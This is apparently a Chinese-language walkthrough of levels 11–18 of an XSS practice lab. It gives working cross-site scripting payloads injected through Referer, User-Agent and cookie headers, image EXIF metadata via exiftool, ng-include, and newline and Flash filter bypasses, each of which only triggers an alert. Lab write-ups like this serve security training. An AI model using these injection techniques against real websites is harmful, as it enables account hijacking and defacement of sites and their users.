LV11 无文本框，查看参数，发现多了个t_ref,为refer,那么用refer头注入，hackbar,add referer头,成功弹窗

payload:" type="text" onmouseover="alert(/Aatrox/)"

LV12 无文本框，查看参数，多了个t_ua，为user-agent的XSS注入，hackbar,add user-agent,成功弹窗

payload:" type="text" onmouseover="alert(/Aatrox/)"

LV13 无文本框，查看参数，多了个t_cook，为cookie的XSS注入，hackbar,add cookies

查看响应头，得到cookie的参数user=... 那么构造payload 成功弹窗

payload:user=" type="text" onclick="alert(1)"

LV14  exif xss，一般利用于文件上传的地方，最经典的就是头像上传，上传一个图片，该图片的exif元数据被修改为xss payload,成功利用弹窗

具体实现使用kali下的exiftool工具

命令如下：

exiftool -FIELD=XSS FILE

exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg

LV15   根据返回的源代码判断出变量src存在XSS注入。ng-include,那么直接调用level1中的script即可，

跨域了。

payload:level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'

LV16   发现src,反斜杠/,还有空格进行了替换，使用%0A（回车符）进行弹窗。

payload:<img%0Asrc=""type="text"%0Aonerror=alert(1)>

LV17 首先查看响应，发现swf,swf是flash文件，参数arg=a,arg=b存在XSS注入，将b换成onmouseover=alert(1),

换个显示flash的浏览器成功弹窗。

payload:arg01=a&arg02=%20onmouseover=alert(1)

LV18 同上，不过对引号进行了过滤。